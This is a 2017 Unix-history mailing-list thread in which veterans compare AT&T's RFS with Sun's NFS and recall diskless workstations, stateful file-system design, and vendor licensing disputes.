> > >- when I refused to do build a diskless system for Masscomp]....
> > 
> > Not the infamous "dikless" workstation?  I remember a riposte from a woman
> > (on Usenet?), saying she didn't know that it was an option...
> 
> I dunno why all the hating on diskless.  They actually work, I used the
> heck out of them.  For kernel work, stacking one on top of the other,
> the test machine being diskless, was a cheap way to get a setup.
> 
> Sure, disk was better and if your work load was write heavy then they
> sucked (*), but for testing, for editing, that sort of thing, they were
> fine.
> 
> --lm

My main work setup today is actually a diskless (X11-less) OpenBSD
system.  It's just something I set up in a VM environment to learn how
to do it (I'm on a work laptop running Windows 10, as I need Windows
for some few work-related tasks), but it works just fine and I have no
reason to change it.  For one thing, it makes backups easier as they can
run locally on the server.

At some point I hope to buy I smaller dedicated server to run the NFS
server (and mail, etc.) but I see no real reason not to keep running the
diskless client in a VM on my laptop.  Heck, then I might even be able
to netboot the laptop itself without disturbing the Windows system on it
at all...

> 
> (*) I did a distributed make when I was working on clusters.  Did the
> compiles on a pile of clients, all the data was on the NFS server, I started
> the build on the NFS server, did all the compiles remotely, did the link
> locally.  Got a 12x speed up on a 16 node + server setup.  The other kernel
> hacks were super jealous.  They were all sharing a big SMP machine with
> a Solaris that didn't scale for shit, I was way faster.
> 

OpenBSD has this "dpb" thing ("distributed ports builder",
/usr/ports/infrastructure/bin/dpb, http://man.openbsd.org/dpb) that
does distributed building of 3rd-party packages.  It does exactly this,
sharing the sources over NFS.


Cheers,

-- 
Andreas Kusalananda Kähäri,
National Bioinformatics Infrastructure Sweden (NBIS),
Uppsala University, Sweden.


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 22:20                               ` Larry McVoy
@ 2017-09-29  2:23                                 ` Kevin Bowling
  2017-09-29  8:59                                 ` Andreas Kusalananda Kähäri
                                                   ` (2 subsequent siblings)
  3 siblings, 0 replies; 48+ messages in thread
From: Kevin Bowling @ 2017-09-29  2:23 UTC (permalink / raw)


This is pretty much how we work today.  Build or crossbuild the kernel
on a host with your editor of choice and hopefully tons of cores like
my dual socket desktop.  Then netboot the device under test/victim.
Panic, edit, repeat, no panic :)

With modern CPUs and NICs you can pretty easily do diskless now.  But
for "scale out" designs there's something to be said for having lots
of fully independent systems, especially if the applications software
can avoid any artificial locality dependence.

On Thu, Sep 28, 2017 at 3:20 PM, Larry McVoy <lm at mcvoy.com> wrote:
> On Fri, Sep 29, 2017 at 08:08:16AM +1000, Dave Horsfall wrote:
>> On Thu, 28 Sep 2017, Clem Cole wrote:
>>
>> >Truth is that an Sun-3 running 'diskless' != as an Apollo running
>> >'twinned.' [There is a famous Clem' story I'll not repeat here from
>> >Masscomp about a typo I made, but your imagination would probably be right
>> >- when I refused to do build a diskless system for Masscomp]....
>>
>> Not the infamous "dikless" workstation?  I remember a riposte from a woman
>> (on Usenet?), saying she didn't know that it was an option...
>
> I dunno why all the hating on diskless.  They actually work, I used the
> heck out of them.  For kernel work, stacking one on top of the other,
> the test machine being diskless, was a cheap way to get a setup.
>
> Sure, disk was better and if your work load was write heavy then they
> sucked (*), but for testing, for editing, that sort of thing, they were
> fine.
>
> --lm
>
> (*) I did a distributed make when I was working on clusters.  Did the
> compiles on a pile of clients, all the data was on the NFS server, I started
> the build on the NFS server, did all the compiles remotely, did the link
> locally.  Got a 12x speed up on a 16 node + server setup.  The other kernel
> hacks were super jealous.  They were all sharing a big SMP machine with
> a Solaris that didn't scale for shit, I was way faster.
>



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 22:08                             ` Dave Horsfall
@ 2017-09-28 22:20                               ` Larry McVoy
  2017-09-29  2:23                                 ` Kevin Bowling
                                                   ` (3 more replies)
  0 siblings, 4 replies; 48+ messages in thread
From: Larry McVoy @ 2017-09-28 22:20 UTC (permalink / raw)


On Fri, Sep 29, 2017 at 08:08:16AM +1000, Dave Horsfall wrote:
> On Thu, 28 Sep 2017, Clem Cole wrote:
> 
> >Truth is that an Sun-3 running 'diskless' != as an Apollo running
> >'twinned.' [There is a famous Clem' story I'll not repeat here from
> >Masscomp about a typo I made, but your imagination would probably be right
> >- when I refused to do build a diskless system for Masscomp]....
> 
> Not the infamous "dikless" workstation?  I remember a riposte from a woman
> (on Usenet?), saying she didn't know that it was an option...

I dunno why all the hating on diskless.  They actually work, I used the
heck out of them.  For kernel work, stacking one on top of the other,
the test machine being diskless, was a cheap way to get a setup.

Sure, disk was better and if your work load was write heavy then they
sucked (*), but for testing, for editing, that sort of thing, they were
fine.

--lm

(*) I did a distributed make when I was working on clusters.  Did the
compiles on a pile of clients, all the data was on the NFS server, I started
the build on the NFS server, did all the compiles remotely, did the link
locally.  Got a 12x speed up on a 16 node + server setup.  The other kernel
hacks were super jealous.  They were all sharing a big SMP machine with
a Solaris that didn't scale for shit, I was way faster.



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 14:27                           ` Clem Cole
@ 2017-09-28 22:08                             ` Dave Horsfall
  2017-09-28 22:20                               ` Larry McVoy
  0 siblings, 1 reply; 48+ messages in thread
From: Dave Horsfall @ 2017-09-28 22:08 UTC (permalink / raw)


On Thu, 28 Sep 2017, Clem Cole wrote:

> Truth is that an Sun-3 running 'diskless' != as an Apollo running 
> 'twinned.' [There is a famous Clem' story I'll not repeat here from 
> Masscomp about a typo I made, but your imagination would probably be 
> right - when I refused to do build a diskless system for Masscomp]....

Not the infamous "dikless" workstation?  I remember a riposte from a woman 
(on Usenet?), saying she didn't know that it was an option...

-- 
Dave Horsfall DTM (VK2KFU)  "Those who don't understand security will suffer."



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 14:07                           ` Larry McVoy
  2017-09-28 14:28                             ` arnold
@ 2017-09-28 20:00                             ` Bakul Shah
  1 sibling, 0 replies; 48+ messages in thread
From: Bakul Shah @ 2017-09-28 20:00 UTC (permalink / raw)




> On Sep 28, 2017, at 7:07 AM, Larry McVoy <lm at mcvoy.com> wrote:
> 
> On Thu, Sep 28, 2017 at 07:49:17AM -0600, arnold at skeeve.com wrote:
>> Kevin Bowling <kevin.bowling at kev009.com> wrote:
>> 
>>> I guess alternatively, what was interesting or neat, about RFS, if
>>> anything?  And what was bad?
>> 
>> Good: Stateful implementation, remote devices worked.
> 
> I'd argue that stateful is really hard to get right when machines panic
> or reboot.  Maybe you can do it on the client but how does one save all
> that state on the server when the server crashes?
> 
> NFS seems simple in hindsight but like a lot of things, getting to that
> simple wasn't chance, it was designed to be stateless because nobody
> had a way to save the state in any reasonable way.

I have some first hand experience with this.... in 1984.

Valid Logic Systems Inc, an early VLSI design vendor hired me
as a contractor to fix bugs in this funky ethernet driver they
had (from Lucas films, IIRC) that did some remote file
operations. I proposed that instead I do a "proper" networked
file system and to my amazement they agreed to let me build a   
prototype.
 
I first built an RPC layer (ethertype 1600 -- see RFC 1700!)
and then EFS (extended FS) that allowed access to remote 
files.  Being a one man team I punted on generality. Just
hand-built separate marshall/unmarshall function for each
remote procedure.  No mounts. Every node's FS was visible to
everyone else (subject to Unix permissions). /net/ path prefix
was for remote files.
 
All this took about 2-3 months. Performance was decent for a
1984 era workstation. Encouraged by the progress I suggested
we add in missing functionality such as the ability to chdir 
to a remote dir etc. Yes, state! And complications!
 
On bootup every node advertized its presence & a "generation"
number (incremented by 1 from the last gen) so that other
nodes can drop old outstanding state -- not unlike a disk 
dying but still messy to clean things up. Next had to make
scheduling priority for remote operations to be interruptible.
People didn't like "cd /net/foo" hanging indefinitely! unlink
and mv were a problem (machine A wouldn't know if machine B    
did this). rm was easy to fix -- just add a refcount for every
remote machine with an open. mv not so. I don't think I ever
solved this. Local FS read/write are atomic so I tried very
hard to make the remote read/writes atomic as well. This can
get interesting in presence of a node crashing....
 
At about this time, Sun gave a presentation on NFS to Valid.
I suspect Valid also realized that doing this properly was
a much bigger than a one man project. Result: they terminated
the project. It was a fun project while it lasted. The fact
this much was done was thanks to a lot of invaluable help
from my friend Jamie Markevitch (also a contractor @ Valid
at that point).

At the time I thought all of these stateful problems were
solvable given more time but now I am not so sure. But as
a result of that belief I never really liked NFS. I felt
they took the easy way out.



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 14:28                             ` arnold
@ 2017-09-28 19:49                               ` Larry McVoy
  0 siblings, 0 replies; 48+ messages in thread
From: Larry McVoy @ 2017-09-28 19:49 UTC (permalink / raw)


On Thu, Sep 28, 2017 at 08:28:08AM -0600, arnold at skeeve.com wrote:
> 
> > > Kevin Bowling <kevin.bowling at kev009.com> wrote:
> > > 
> > > > I guess alternatively, what was interesting or neat, about RFS, if
> > > > anything?  And what was bad?
> 
> > On Thu, Sep 28, 2017 at 07:49:17AM -0600, arnold at skeeve.com wrote:
> > > Good: Stateful implementation, remote devices worked.
> 
> Larry McVoy <lm at mcvoy.com> wrote:
> 
> > I'd argue that stateful is really hard to get right when machines panic
> > or reboot.  Maybe you can do it on the client but how does one save all
> > that state on the server when the server crashes?
> >
> > NFS seems simple in hindsight but like a lot of things, getting to that
> > simple wasn't chance, it was designed to be stateless because nobody
> > had a way to save the state in any reasonable way.
> 
> I won't disagree with you.
> 
> I remember that stateful vs. stateless was one of the big technical
> debates of the time, and I remember that (my impression of) the general
> feeling was that stateful was better but much harder to do / get right.
> (Again, I don't want to start another long thread over this, especially
> as I don't really remember any more than what I just wrote.)
> 
> So we can downgrade "stateful" from "good" to "different" and let
> it go at that. :-)

That other post that had a link to a post from Rick Macklem tickled my
memory so I went looking.

He wrote this:

https://docs.freebsd.org/44doc/smm/06.nfs/paper.pdf

which included some of what Clem has hinted at (I think).  Did this stuff
ever go anywhere?  Is it BSD only?  Abandoned or what?

--lm



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 14:08 ` David
@ 2017-09-28 17:22   ` Pete Wright
  0 siblings, 0 replies; 48+ messages in thread
From: Pete Wright @ 2017-09-28 17:22 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 1655 bytes --]



On 09/28/2017 07:08, David wrote:
>> It's important to note, when talking about NFS, that there was Sun's NFS
>> and everyone else's NFS.  Sun ran their entire company on NFS.  /usr/dist
>> was where all the software that was not part of SunOS lived, it was an
>> NFS mounted volume (that was replicated to each subnet).  It was heavily
>> used as were a lot of other things.  The automounter at Sun just worked,
>> wanted to see your buddies stuff?  You just cd-ed to it and it worked.
>>
>> Much like mmap, NFS did not export well to other companies.  When I went
>> to SGI I actually had a principle engineer (like Suns distinguished
>> engineer) tell me "nobody trusts NFS, use rcp if you care about your
>> data".  What.  The.  Fuck.  At Sun, NFS just worked.  All the time.
>> The idea that it would not work was unthinkable and if it ever did
>> not work it got fixed right away.
>>
>> Other companies, it was a checkbox thing, it sorta worked.  That was
>> an eye opener for me.  mmap was the same way, Sun got it right and
>> other companies sort of did.
>>
> I remember the days of NFS Connect-a-thons where all the different
> vendors would get together and see if they all interoperated. It was
> interesting to see who worked and who didn’t. And all the hacking to
> fix your implementation to talk to vendor X while not breaking it working
> with vendor Y.
>
> Good times indeed.

It is funny you mention this - someone mentioned RedHat is doing 
something similar to this in Boston next week:

https://lists.freebsd.org/pipermail/freebsd-current/2017-September/067013.html

-pete

-- 
Pete Wright
pete at nomadlogic.org
@nomadlogicLA



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 13:45                             ` Larry McVoy
@ 2017-09-28 17:12                               ` Steve Johnson
  0 siblings, 0 replies; 48+ messages in thread
From: Steve Johnson @ 2017-09-28 17:12 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 479 bytes --]

I remember Bill Joy visiting Bell Labs and getting a very complete
demo of RFS and being very impressed.  Within a year, Sun announced
NFS.  It took USG 18 months after that to get RFS out the door. 
Just another example of how AT&T could take a technical advantage and
manage to squander it...

Steve


-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170928/7e039008/attachment-0001.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 14:07                           ` Larry McVoy
@ 2017-09-28 14:28                             ` arnold
  2017-09-28 19:49                               ` Larry McVoy
  2017-09-28 20:00                             ` Bakul Shah
  1 sibling, 1 reply; 48+ messages in thread
From: arnold @ 2017-09-28 14:28 UTC (permalink / raw)



> > Kevin Bowling <kevin.bowling at kev009.com> wrote:
> > 
> > > I guess alternatively, what was interesting or neat, about RFS, if
> > > anything?  And what was bad?

> On Thu, Sep 28, 2017 at 07:49:17AM -0600, arnold at skeeve.com wrote:
> > Good: Stateful implementation, remote devices worked.

Larry McVoy <lm at mcvoy.com> wrote:

> I'd argue that stateful is really hard to get right when machines panic
> or reboot.  Maybe you can do it on the client but how does one save all
> that state on the server when the server crashes?
>
> NFS seems simple in hindsight but like a lot of things, getting to that
> simple wasn't chance, it was designed to be stateless because nobody
> had a way to save the state in any reasonable way.

I won't disagree with you.

I remember that stateful vs. stateless was one of the big technical
debates of the time, and I remember that (my impression of) the general
feeling was that stateful was better but much harder to do / get right.
(Again, I don't want to start another long thread over this, especially
as I don't really remember any more than what I just wrote.)

So we can downgrade "stateful" from "good" to "different" and let
it go at that. :-)

Thanks,

Arnold



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 13:49                         ` arnold
  2017-09-28 14:07                           ` Larry McVoy
@ 2017-09-28 14:27                           ` Clem Cole
  2017-09-28 22:08                             ` Dave Horsfall
  1 sibling, 1 reply; 48+ messages in thread
From: Clem Cole @ 2017-09-28 14:27 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 3330 bytes --]

On Thu, Sep 28, 2017 at 9:49 AM, <arnold at skeeve.com> wrote:

> Kevin Bowling <kevin.bowling at kev009.com> wrote:
>
> > I guess alternatively, what was interesting or neat, about RFS, if
> > anything?  And what was bad?
>
> Good: Stateful implementation, remote devices worked.

​Right -- and full POSIX FS system semantics.  Everything worked as you
expected - no surprises.



>
>
> Bad: Sent binary over the wire, making interoperability harder.

​Yup - Peter used a very simple function shipping model in Eighth edition
and Dave did the same with RFS.   With Plan8 they got more sophisticated.
Plan8 and EFS were more similar in that aspect.​

The other thing RFS did not have 'out of the box' was a 'diskless.'

Truth is that an Sun-3 running 'diskless' != as an Apollo running
'twinned.'  [There is a famous Clem' story I'll not repeat here from
Masscomp about a typo I made, but your imagination would probably be right
- when I refused to do build a diskless system for Masscomp]....

But 'diskless' was the worlds sleaziest 'add-in' disk business and Sun sold
a ton of systems.   People were not going to toss out their diskless system
when they discovered the performance sucked.  The bought a disk for them
(even though a Masscomp or an Apollo with a disk was cheaper to start).

[It was brilliant marketing on Sun's part...  It was the #1 thing that made
Sun succeed early on.  NFS and the low end entry system made Sun .. they
nailed it.]



> Also,
> ​ ​
> at System V Relese 3 AT&T made the licensing terms much harder for
> ​ ​
> the big vendors to swallow (Dec, IBM, HP ...) so many of them didn't
> bother.

​The funny part was the SVR3 was the 'final' license most of the vendors
used (IBM, HP, DEC) when it was done.  IBM and HP both bought it out.   DEC
never did, although DEC shipped Tru64 on an SVR3 license.

Sun bought out an SRV4 license but that was different.​



> I don't remember the details; something like having to pass
> a validation suite to be called "UNIX" and who knows what else.

​The suite was only part of the issue, there were other terms that AT&T
back-ed off, when IBM, HP et al pushed back.    They all have System-III
licenses, AT&T really wanted to move them to SVR3 licenses.




>
>
> As others have noted, the Unix wars were a sad, sad story, and I'd
> as soon not see the details rehashed endlessly.

​I agree - it was a sad, sad time.   It was 'who was going to control this'
issue.​
None of them could see, the tighter the grabbed, the less control they had
and more the seeded control the Microsoft.   As you said, sad, sad, time...




> But licensing was
> ​ ​
> a big factor in the non-adoption of RFS, not just the technical side.
> Sigh


​Hmm...   I'm not so sure.   If RFS had come out before NFS, maybe.  But
NFS took root and was cheap and easy and good enough for what people needed
to do most everything.

That was what made it a brilliant solution.  I admire Kleiman for find the
hole and doing such a good job of filling it.

In many ways, Dave did 'more' with RFS but it was 'harder' to in a number
of different ways to consume (both technical and political)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170928/21c511e7/attachment.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
       [not found] <mailman.1219.1506559196.3779.tuhs@minnie.tuhs.org>
@ 2017-09-28 14:08 ` David
  2017-09-28 17:22   ` Pete Wright
  0 siblings, 1 reply; 48+ messages in thread
From: David @ 2017-09-28 14:08 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 1348 bytes --]

> 
> It's important to note, when talking about NFS, that there was Sun's NFS
> and everyone else's NFS.  Sun ran their entire company on NFS.  /usr/dist
> was where all the software that was not part of SunOS lived, it was an
> NFS mounted volume (that was replicated to each subnet).  It was heavily
> used as were a lot of other things.  The automounter at Sun just worked,
> wanted to see your buddies stuff?  You just cd-ed to it and it worked.
> 
> Much like mmap, NFS did not export well to other companies.  When I went
> to SGI I actually had a principle engineer (like Suns distinguished
> engineer) tell me "nobody trusts NFS, use rcp if you care about your
> data".  What.  The.  Fuck.  At Sun, NFS just worked.  All the time.
> The idea that it would not work was unthinkable and if it ever did
> not work it got fixed right away.
> 
> Other companies, it was a checkbox thing, it sorta worked.  That was
> an eye opener for me.  mmap was the same way, Sun got it right and 
> other companies sort of did.
> 
I remember the days of NFS Connect-a-thons where all the different
vendors would get together and see if they all interoperated. It was
interesting to see who worked and who didn’t. And all the hacking to
fix your implementation to talk to vendor X while not breaking it working
with vendor Y.

Good times indeed.

	David



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 13:49                         ` arnold
@ 2017-09-28 14:07                           ` Larry McVoy
  2017-09-28 14:28                             ` arnold
  2017-09-28 20:00                             ` Bakul Shah
  2017-09-28 14:27                           ` Clem Cole
  1 sibling, 2 replies; 48+ messages in thread
From: Larry McVoy @ 2017-09-28 14:07 UTC (permalink / raw)


On Thu, Sep 28, 2017 at 07:49:17AM -0600, arnold at skeeve.com wrote:
> Kevin Bowling <kevin.bowling at kev009.com> wrote:
> 
> > I guess alternatively, what was interesting or neat, about RFS, if
> > anything?  And what was bad?
> 
> Good: Stateful implementation, remote devices worked.

I'd argue that stateful is really hard to get right when machines panic
or reboot.  Maybe you can do it on the client but how does one save all
that state on the server when the server crashes?

NFS seems simple in hindsight but like a lot of things, getting to that
simple wasn't chance, it was designed to be stateless because nobody
had a way to save the state in any reasonable way.



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27 23:13                       ` Kevin Bowling
  2017-09-28  0:39                         ` Larry McVoy
  2017-09-28  0:54                         ` Dave Horsfall
@ 2017-09-28 13:49                         ` arnold
  2017-09-28 14:07                           ` Larry McVoy
  2017-09-28 14:27                           ` Clem Cole
  2 siblings, 2 replies; 48+ messages in thread
From: arnold @ 2017-09-28 13:49 UTC (permalink / raw)


Kevin Bowling <kevin.bowling at kev009.com> wrote:

> I guess alternatively, what was interesting or neat, about RFS, if
> anything?  And what was bad?

Good: Stateful implementation, remote devices worked.

Bad: Sent binary over the wire, making interoperability harder. Also,
at System V Relese 3 AT&T made the licensing terms much harder for
the big vendors to swallow (Dec, IBM, HP ...) so many of them didn't
bother. I don't remember the details; something like having to pass
a validation suite to be called "UNIX" and who knows what else.

As others have noted, the Unix wars were a sad, sad story, and I'd
as soon not see the details rehashed endlessly. But licensing was
a big factor in the non-adoption of RFS, not just the technical side.
Sigh.

Arnold



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28  3:19                           ` Theodore Ts'o
@ 2017-09-28 13:45                             ` Larry McVoy
  2017-09-28 17:12                               ` Steve Johnson
  0 siblings, 1 reply; 48+ messages in thread
From: Larry McVoy @ 2017-09-28 13:45 UTC (permalink / raw)


On Wed, Sep 27, 2017 at 11:19:49PM -0400, Theodore Ts'o wrote:
> On Wed, Sep 27, 2017 at 05:39:54PM -0700, Larry McVoy wrote:
> > It's important to note, when talking about NFS, that there was Sun's NFS
> > and everyone else's NFS.  Sun ran their entire company on NFS.  /usr/dist
> > was where all the software that was not part of SunOS lived, it was an
> > NFS mounted volume (that was replicated to each subnet).  It was heavily
> > used as were a lot of other things.  The automounter at Sun just worked,
> > wanted to see your buddies stuff?  You just cd-ed to it and it worked.
> 
> So the story that went around MIT Project Athena was that there was
> Sun's NFS, and then there was the version which Sun gave way for
> others to use, which was a clean-room re-implementation by a
> relatively junior engineer.  Which is why when a file was truncated
> and then rewritten, and "truncate this file" packet got reordered and
> got received after the "here's the new 4k of contents of the file",
> Hilarty Enused.

No, the problem was that people didn't understand open to close
semantics.  Sun was actually an engineering organization that took
the rules seriously.   You know, stuff like sync writes actually
need being sync in order to get the semantics right.



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28  0:39                         ` Larry McVoy
@ 2017-09-28  3:19                           ` Theodore Ts'o
  2017-09-28 13:45                             ` Larry McVoy
  0 siblings, 1 reply; 48+ messages in thread
From: Theodore Ts'o @ 2017-09-28  3:19 UTC (permalink / raw)


On Wed, Sep 27, 2017 at 05:39:54PM -0700, Larry McVoy wrote:
> It's important to note, when talking about NFS, that there was Sun's NFS
> and everyone else's NFS.  Sun ran their entire company on NFS.  /usr/dist
> was where all the software that was not part of SunOS lived, it was an
> NFS mounted volume (that was replicated to each subnet).  It was heavily
> used as were a lot of other things.  The automounter at Sun just worked,
> wanted to see your buddies stuff?  You just cd-ed to it and it worked.

So the story that went around MIT Project Athena was that there was
Sun's NFS, and then there was the version which Sun gave way for
others to use, which was a clean-room re-implementation by a
relatively junior engineer.  Which is why when a file was truncated
and then rewritten, and "truncate this file" packet got reordered and
got received after the "here's the new 4k of contents of the file",
Hilarty Enused.

I'm pretty sure the last part was true, because we debugged it at MIT.
Does anyone know if the bit of the "open source" version of NFS being
a crappy reimplementation which Sun "gifted" to the rest of the
industry was true or not?

					- Ted



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28  0:54                         ` Dave Horsfall
@ 2017-09-28  0:59                           ` William Pechter
  0 siblings, 0 replies; 48+ messages in thread
From: William Pechter @ 2017-09-28  0:59 UTC (permalink / raw)


I seem to remember it supported remote devices including tape drives.

Never was lucky enough to have hardware to run it.  Later, the wife had a 3b2... 

I never had any way to talk to it beyond uucp. 

Bill

-----Original Message-----
From: Dave Horsfall <dave@horsfall.org>
To: The Eunuchs Hysterical Society <tuhs at tuhs.org>
Sent: Wed, 27 Sep 2017 8:54 PM
Subject: Re: [TUHS] RFS was: Re: UNIX of choice these days?

On Wed, 27 Sep 2017, Kevin Bowling wrote:
> I guess alternatively, what was interesting or neat, about RFS, if
> anything?  And what was bad?

Didn't it support remote devices?  Or am I thinking of something else?

-- 
Dave Horsfall DTM (VK2KFU)  "Those who don't understand security will suffer."



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27 23:13                       ` Kevin Bowling
  2017-09-28  0:39                         ` Larry McVoy
@ 2017-09-28  0:54                         ` Dave Horsfall
  2017-09-28  0:59                           ` William Pechter
  2017-09-28 13:49                         ` arnold
  2 siblings, 1 reply; 48+ messages in thread
From: Dave Horsfall @ 2017-09-28  0:54 UTC (permalink / raw)


On Wed, 27 Sep 2017, Kevin Bowling wrote:
> I guess alternatively, what was interesting or neat, about RFS, if
> anything?  And what was bad?

Didn't it support remote devices?  Or am I thinking of something else?

-- 
Dave Horsfall DTM (VK2KFU)  "Those who don't understand security will suffer."



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27 23:13                       ` Kevin Bowling
@ 2017-09-28  0:39                         ` Larry McVoy
  2017-09-28  3:19                           ` Theodore Ts'o
  2017-09-28  0:54                         ` Dave Horsfall
  2017-09-28 13:49                         ` arnold
  2 siblings, 1 reply; 48+ messages in thread
From: Larry McVoy @ 2017-09-28  0:39 UTC (permalink / raw)


I'll weigh on this since my office mate at Sun was the Sun RFS guy (Howard
Chartok, great guy, Mr swapfs, I still remember a long discussion we had
outside of Antonio's nuthouse in Palo Alto about how to tie different
swap files to process groups so we could do better at pagin/pageout,
but I digress.  I should write up that discussion though, it's still
useful today).

From what I remember, RFS worked well in a homogeneous environment.  It
passed structs in binary across the wire.

NFS was based on Sun's RPC stuff that marshalled and unmarshalled the
data.  So it worked with little ints and big ints and Intel byte order
and everyone else's byte order.  RFS not so much.  The RPC stuff is 
actually pretty sweet, I built something I called RPC vectors on top
of it, Ron will remember that, but I digress again.

It's important to note, when talking about NFS, that there was Sun's NFS
and everyone else's NFS.  Sun ran their entire company on NFS.  /usr/dist
was where all the software that was not part of SunOS lived, it was an
NFS mounted volume (that was replicated to each subnet).  It was heavily
used as were a lot of other things.  The automounter at Sun just worked,
wanted to see your buddies stuff?  You just cd-ed to it and it worked.

Much like mmap, NFS did not export well to other companies.  When I went
to SGI I actually had a principle engineer (like Suns distinguished
engineer) tell me "nobody trusts NFS, use rcp if you care about your
data".  What.  The.  Fuck.  At Sun, NFS just worked.  All the time.
The idea that it would not work was unthinkable and if it ever did
not work it got fixed right away.

Other companies, it was a checkbox thing, it sorta worked.  That was
an eye opener for me.  mmap was the same way, Sun got it right and 
other companies sort of did.


On Wed, Sep 27, 2017 at 04:13:07PM -0700, Kevin Bowling wrote:
> I guess alternatively, what was interesting or neat, about RFS, if
> anything?  And what was bad?
> 
> On Wed, Sep 27, 2017 at 4:11 PM, Clem Cole <clemc at ccc.com> wrote:
> >
> >
> > On Wed, Sep 27, 2017 at 7:01 PM, Kevin Bowling <kevin.bowling at kev009.com>
> > wrote:
> >>
> >>
> >> What were the market forces or limitations that led to NFS prevailing?
> >
> > Sun pretty much gave it away.   It was simple and 'good enough.'
> >
> > The Issue was it not a real UNIX file system and did not support full UNIX
> > semantics.   For a lot of things (like program development) that was usually
> > ok.  It also exposed a lot a issues in user code - things like programs that
> > never bothered to check for errors returns (like fclose).
> >
> > So bad things happened for a long time in a lot of code (silent holes in
> > your SCCS files that did get detected until months later).
> >
> > But to Sun and NFS's credit, it solved a problem that was there and was
> > cheap and so folks used it.
> >
> > Clem

-- 
---
Larry McVoy            	     lm at mcvoy.com             http://www.mcvoy.com/lm 



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27 23:11                     ` Clem Cole
@ 2017-09-27 23:13                       ` Kevin Bowling
  2017-09-28  0:39                         ` Larry McVoy
                                           ` (2 more replies)
  0 siblings, 3 replies; 48+ messages in thread
From: Kevin Bowling @ 2017-09-27 23:13 UTC (permalink / raw)


I guess alternatively, what was interesting or neat, about RFS, if
anything?  And what was bad?

On Wed, Sep 27, 2017 at 4:11 PM, Clem Cole <clemc at ccc.com> wrote:
>
>
> On Wed, Sep 27, 2017 at 7:01 PM, Kevin Bowling <kevin.bowling at kev009.com>
> wrote:
>>
>>
>> What were the market forces or limitations that led to NFS prevailing?
>
> Sun pretty much gave it away.   It was simple and 'good enough.'
>
> The Issue was it not a real UNIX file system and did not support full UNIX
> semantics.   For a lot of things (like program development) that was usually
> ok.  It also exposed a lot a issues in user code - things like programs that
> never bothered to check for errors returns (like fclose).
>
> So bad things happened for a long time in a lot of code (silent holes in
> your SCCS files that did get detected until months later).
>
> But to Sun and NFS's credit, it solved a problem that was there and was
> cheap and so folks used it.
>
> Clem



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27 23:01                   ` Kevin Bowling
@ 2017-09-27 23:11                     ` Clem Cole
  2017-09-27 23:13                       ` Kevin Bowling
  0 siblings, 1 reply; 48+ messages in thread
From: Clem Cole @ 2017-09-27 23:11 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 925 bytes --]

On Wed, Sep 27, 2017 at 7:01 PM, Kevin Bowling <kevin.bowling at kev009.com>
wrote:

>
> What were the market forces or limitations that led to NFS prevailing?
>
​Sun pretty much gave it away.   It was simple and 'good enough.'

The Issue was it not a real UNIX file system and did not support full UNIX
semantics.   For a lot of things (like program development) that was
usually ok.  It also exposed a lot a issues in user code - things like
programs that never bothered to check for errors returns (like fclose).

So bad things happened for a long time in a lot of code (silent holes in
your SCCS files that did get detected until months later).

But to Sun and NFS's credit, it solved a problem that was there and was
cheap and so folks used it.

Clem
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170927/ae718e15/attachment.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-27  8:44                 ` arnold
  2017-09-27 15:25                   ` Arthur Krewat
  2017-09-27 17:38                   ` Mantas Mikulėnas
@ 2017-09-27 23:01                   ` Kevin Bowling
  2017-09-27 23:11                     ` Clem Cole
  2 siblings, 1 reply; 48+ messages in thread
